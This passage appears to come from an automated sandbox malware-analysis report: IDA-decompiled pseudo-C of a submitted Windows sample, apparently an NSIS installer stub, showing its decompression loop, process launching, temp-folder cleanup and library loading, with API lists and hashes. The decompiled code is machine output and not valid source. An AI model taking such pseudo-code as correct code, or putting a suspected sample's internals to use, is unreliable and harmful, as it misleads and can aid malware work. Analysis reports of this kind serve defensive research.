                                                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  														__eflags =  *_t391;
                                                  														goto L119;
                                                  													}
                                                  													__eax =  *(__ebp - 0x50);
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__esi = __edi + __eax;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__ax =  *__esi;
                                                  													__ecx = __ax & 0x0000ffff;
                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                  														__ecx = 0;
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  														__ecx = 1;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  														__ebx = 1;
                                                  														__ecx =  *(__ebp - 0x48);
                                                  														__ebx = 1 << __cl;
                                                  														__ecx = 1 << __cl;
                                                  														__ebx =  *(__ebp - 0x44);
                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                  														__cx = __ax;
                                                  														__cx = __ax >> 5;
                                                  														__eax = __eax - __ecx;
                                                  														__edi = __edi + 1;
                                                  														__eflags = __edi;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  														 *__esi = __ax;
                                                  														 *(__ebp - 0x50) = __edi;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __edx;
                                                  														0x800 = 0x800 - __ecx;
                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  														 *__esi = __dx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L111:
                                                  														_t368 = __ebp - 0x48;
                                                  														 *_t368 =  *(__ebp - 0x48) + 1;
                                                  														__eflags =  *_t368;
                                                  														goto L112;
                                                  													} else {
                                                  														goto L109;
                                                  													}
                                                  												}
                                                  												__ecx =  *(__ebp - 0xc);
                                                  												__ebx = __ebx + __ebx;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													__ebx = __ebx | 0x00000001;
                                                  													__eflags = __ebx;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													L101:
                                                  													_t338 = __ebp - 0x48;
                                                  													 *_t338 =  *(__ebp - 0x48) - 1;
                                                  													__eflags =  *_t338;
                                                  													goto L102;
                                                  												} else {
                                                  													goto L99;
                                                  												}
                                                  											}
                                                  											__edx =  *(__ebp - 4);
                                                  											__eax = __eax - __ebx;
                                                  											 *(__ebp - 0x40) = __ecx;
                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  											goto L108;
                                                  										case 0x1a:
                                                  											L56:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												 *(__ebp - 0x88) = 0x1a;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x68);
                                                  											__al =  *(__ebp - 0x5c);
                                                  											__edx =  *(__ebp - 8);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  											 *( *(__ebp - 0x68)) = __al;
                                                  											__ecx =  *(__ebp - 0x14);
                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                  											__eax = __ecx + 1;
                                                  											__edx = 0;
                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t192;
                                                  											goto L79;
                                                  										case 0x1b:
                                                  											L75:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												 *(__ebp - 0x88) = 0x1b;
                                                  												goto L170;
                                                  											}
                                                  											__eax =  *(__ebp - 0x14);
                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                  												__eflags = __eax;
                                                  											}
                                                  											__edx =  *(__ebp - 8);
                                                  											__cl =  *(__eax + __edx);
                                                  											__eax =  *(__ebp - 0x14);
                                                  											 *(__ebp - 0x5c) = __cl;
                                                  											 *(__eax + __edx) = __cl;
                                                  											__eax = __eax + 1;
                                                  											__edx = 0;
                                                  											_t274 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t274;
                                                  											__eax =  *(__ebp - 0x68);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											_t283 = __ebp - 0x64;
                                                  											 *_t283 =  *(__ebp - 0x64) - 1;
                                                  											__eflags =  *_t283;
                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                  											L79:
                                                  											 *(__ebp - 0x14) = __edx;
                                                  											goto L80;
                                                  										case 0x1c:
                                                  											while(1) {
                                                  												L123:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													break;
                                                  												}
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t414 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t414;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  												__eflags =  *(__ebp - 0x30);
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												 *(__ebp - 0x14) = _t414;
                                                  												if( *(__ebp - 0x30) > 0) {
                                                  													continue;
                                                  												} else {
                                                  													L80:
                                                  													 *(__ebp - 0x88) = 2;
                                                  													goto L1;
                                                  												}
                                                  											}
                                                  											 *(__ebp - 0x88) = 0x1c;
                                                  											goto L170;
                                                  									}
                                                  								}
                                                  								L171:
                                                  								_t535 = _t534 | 0xffffffff;
                                                  								goto L172;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}













                                                  0x0040629e
                                                  0x004062a4
                                                  0x004062ce
                                                  0x004062d4
                                                  0x004062db
                                                  0x00000000
                                                  0x004062db
                                                  0x004062aa
                                                  0x004062ad
                                                  0x004062b2
                                                  0x004062b2
                                                  0x004062bd
                                                  0x004062c5
                                                  0x004062c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040630d
                                                  0x00406313
                                                  0x00406316
                                                  0x00406323
                                                  0x0040632b
                                                  0x0040699f
                                                  0x00000000
                                                  0x00000000
                                                  0x004062e2
                                                  0x004062e2
                                                  0x004062e6
                                                  0x00406b31
                                                  0x00000000
                                                  0x00406b31
                                                  0x004062f2
                                                  0x004062fd
                                                  0x004062fd
                                                  0x004062fd
                                                  0x00406300
                                                  0x00406303
                                                  0x00406306
                                                  0x0040630b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406333
                                                  0x00406335
                                                  0x00406338
                                                  0x004063a9
                                                  0x004063ac
                                                  0x004063af
                                                  0x004063b6
                                                  0x004063c0
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040633a
                                                  0x0040633e
                                                  0x00406341
                                                  0x00406343
                                                  0x00406346
                                                  0x00406349
                                                  0x0040634b
                                                  0x0040634e
                                                  0x00406350
                                                  0x00406355
                                                  0x00406358
                                                  0x0040635b
                                                  0x0040635f
                                                  0x00406366
                                                  0x00406369
                                                  0x00406370
                                                  0x00406374
                                                  0x0040637c
                                                  0x0040637c
                                                  0x0040637c
                                                  0x00406376
                                                  0x00406376
                                                  0x00406376
                                                  0x0040636b
                                                  0x0040636b
                                                  0x0040636b
                                                  0x00406380
                                                  0x00406383
                                                  0x004063a1
                                                  0x004063a3
                                                  0x00000000
                                                  0x00406385
                                                  0x00406385
                                                  0x00406388
                                                  0x0040638b
                                                  0x0040638e
                                                  0x00406390
                                                  0x00406390
                                                  0x00406390
                                                  0x00406393
                                                  0x00406396
                                                  0x00406398
                                                  0x00406399
                                                  0x0040639c
                                                  0x00000000
                                                  0x0040639c
                                                  0x00000000
                                                  0x004065d2
                                                  0x004065d6
                                                  0x004065f4
                                                  0x004065f7
                                                  0x004065fe
                                                  0x00406601
                                                  0x00406604
                                                  0x00406607
                                                  0x0040660a
                                                  0x0040660d
                                                  0x0040660f
                                                  0x00406616
                                                  0x00406617
                                                  0x00406619
                                                  0x0040661c
                                                  0x0040661f
                                                  0x00406622
                                                  0x00406622
                                                  0x00406627
                                                  0x00000000
                                                  0x00406627
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e8
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040667f
                                                  0x00406683
                                                  0x00000000
                                                  0x00000000
                                                  0x00406689
                                                  0x0040668d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406693
                                                  0x00406695
                                                  0x00406699
                                                  0x00406699
                                                  0x0040669c
                                                  0x004066a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f4
                                                  0x004066fb
                                                  0x004066fe
                                                  0x00406701
                                                  0x0040670b
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x004066f6
                                                  0x00000000
                                                  0x00000000
                                                  0x00406717
                                                  0x0040671b
                                                  0x00406722
                                                  0x00406725
                                                  0x00406728
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040671d
                                                  0x0040672b
                                                  0x0040672e
                                                  0x00406731
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x00000000
                                                  0x00000000
                                                  0x004067d7
                                                  0x004067d7
                                                  0x004067db
                                                  0x00406b79
                                                  0x00000000
                                                  0x00406b79
                                                  0x004067e1
                                                  0x004067e4
                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x00000000
                                                  0x00406969
                                                  0x0040696d
                                                  0x0040698f
                                                  0x00406992
                                                  0x0040699c
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040696f
                                                  0x00406972
                                                  0x00406976
                                                  0x00406979
                                                  0x00406979
                                                  0x0040697c
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                                  • Instruction ID: da41e8a59283c5151f8221a14089d7a30d21e655082da74c54adec62798c0c17
                                                  • Opcode Fuzzy Hash: 8be065f2055dc1cd174fd52254904ed3951c4d9a2d1eb8bfd7021972752a86bd
                                                  • Instruction Fuzzy Hash: 3B714771E00229CBDF28CF98C8447ADBBB1FB44305F15816ED856BB291C778AA56DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E00401E1B() {
                                                  				void* _t15;
                                                  				void* _t24;
                                                  				void* _t26;
                                                  				void* _t31;
                                                  
                                                  				_t28 = E00402A0C(_t24);
                                                  				E00404FE7(0xffffffeb, _t13);
                                                  				_t15 = E0040555B(_t28); // executed
                                                  				 *(_t31 + 8) = _t15;
                                                  				if(_t15 == _t24) {
                                                  					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                  				} else {
                                                  					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
                                                  						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                  							E004060C3(0xf);
                                                  						}
                                                  						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc); // executed
                                                  						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
                                                  							if( *(_t31 - 0xc) != _t24) {
                                                  								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                  							}
                                                  						} else {
                                                  							E00405C59(_t26,  *(_t31 - 0xc));
                                                  						}
                                                  					}
                                                  					_push( *(_t31 + 8));
                                                  					CloseHandle();
                                                  				}
                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t31 - 4));
                                                  				return 0;
                                                  			}








                                                  APIs
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                    • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                    • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                    • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                    • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                    • Part of subcall function 0040555B: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                    • Part of subcall function 0040555B: CloseHandle.KERNEL32(?), ref: 0040558D
                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                                                  • GetExitCodeProcess.KERNELBASE ref: 00401E65
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3521207402-0
                                                  • Opcode ID: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                                  • Instruction ID: f982a8a4b5a7b7f11f96eebada5615e554ddc2bd3b1688d6a113b967b57f1ffa
                                                  • Opcode Fuzzy Hash: 1a5498c97b03bf9ad2a802c144142cbddf4fe197977c824e4eb94680ac26f956
                                                  • Instruction Fuzzy Hash: 3C016D31D04104EBDF11AF91C945A9E7771EB40354F24813BF905B51E1C7794A81DB9E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040365C() {
                                                  				void* _t1;
                                                  				void* _t2;
                                                  				void* _t4;
                                                  				void* _t7;
                                                  				signed int _t12;
                                                  
                                                  				_t1 =  *0x409014; // 0xffffffff
                                                  				if(_t1 != 0xffffffff) {
                                                  					CloseHandle(_t1);
                                                  					 *0x409014 =  *0x409014 | 0xffffffff;
                                                  				}
                                                  				_t2 =  *0x409018; // 0xffffffff
                                                  				if(_t2 != 0xffffffff) {
                                                  					CloseHandle(_t2);
                                                  					 *0x409018 =  *0x409018 | 0xffffffff;
                                                  					_t12 =  *0x409018;
                                                  				}
                                                  				E004036B9();
                                                  				_t4 = E00405620(_t7, _t12, "C:\\Users\\jones\\AppData\\Local\\Temp\\nsaAF60.tmp\\", 7); // executed
                                                  				return _t4;
                                                  			}









                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 0040366E
                                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,00403482,00000000), ref: 00403682
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\, xrefs: 00403692
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\
                                                  • API String ID: 2962429428-1031102299
                                                  • Opcode ID: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                                  • Instruction ID: d9e8a33d28c15f53d2eb362b268636166e6a3abf7a8e9a4d7af1e4fffe66201b
                                                  • Opcode Fuzzy Hash: ff0635daa02b02786d4c6060d7483ceeb15bee290bd1bd17e04d86e07ad0f233
                                                  • Instruction Fuzzy Hash: 52E08C30900A10A6C230AF7CBE499553B189B41331BA04B26F638F22F2C3395E865AED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
                                                  				intOrPtr* _t6;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  				signed int _t11;
                                                  				void* _t12;
                                                  				signed int _t16;
                                                  				signed int _t17;
                                                  				void* _t18;
                                                  
                                                  				_t17 = _a4;
                                                  				while(_t17 >= 0) {
                                                  					_t6 = _t17 * 0x1c +  *0x423fb0;
                                                  					if( *_t6 == 1) {
                                                  						break;
                                                  					}
                                                  					_push(_t6); // executed
                                                  					_t8 = E00401434(); // executed
                                                  					if(_t8 == 0x7fffffff) {
                                                  						return 0x7fffffff;
                                                  					}
                                                  					_t10 = E0040136D(_t8);
                                                  					if(_t10 != 0) {
                                                  						_t11 = _t10 - 1;
                                                  						_t16 = _t17;
                                                  						_t17 = _t11;
                                                  						_t12 = _t11 - _t16;
                                                  					} else {
                                                  						_t12 = _t10 + 1;
                                                  						_t17 = _t17 + 1;
                                                  					}
                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                  						 *0x42376c =  *0x42376c + _t12;
                                                  						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42376c, 0x7530,  *0x423754), 0);
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}












                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                                  • Instruction ID: eb1965022be8e41d6b0e1b01d22ae835c185752925051d09dc6a9c457a4677e5
                                                  • Opcode Fuzzy Hash: cbf58c645cd0bca2d3f8e9800932a6635a1f6a75dc97f939ce2f6e9f6cf97e13
                                                  • Instruction Fuzzy Hash: 5B01F471B242119BEB195F389D04B2A36A8E750319F10813BF851F66F1D67CDC029B8D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406087(signed int _a4) {
                                                  				struct HINSTANCE__* _t5;
                                                  				signed int _t10;
                                                  
                                                  				_t10 = _a4 << 3;
                                                  				_t8 =  *(_t10 + 0x409248);
                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x409248));
                                                  				if(_t5 != 0) {
                                                  					L2:
                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40924c));
                                                  				}
                                                  				_t5 = E0040601D(_t8); // executed
                                                  				if(_t5 == 0) {
                                                  					return 0;
                                                  				}
                                                  				goto L2;
                                                  			}






                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                    • Part of subcall function 0040601D: GetSystemDirectoryA.KERNEL32 ref: 00406034
                                                    • Part of subcall function 0040601D: wsprintfA.USER32 ref: 0040606D
                                                    • Part of subcall function 0040601D: LoadLibraryA.KERNELBASE(?), ref: 0040607D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                                  • Instruction ID: 21d738a59780ab69202fff5272367df6aef59ea6a60bf168f6e21a2e897772da
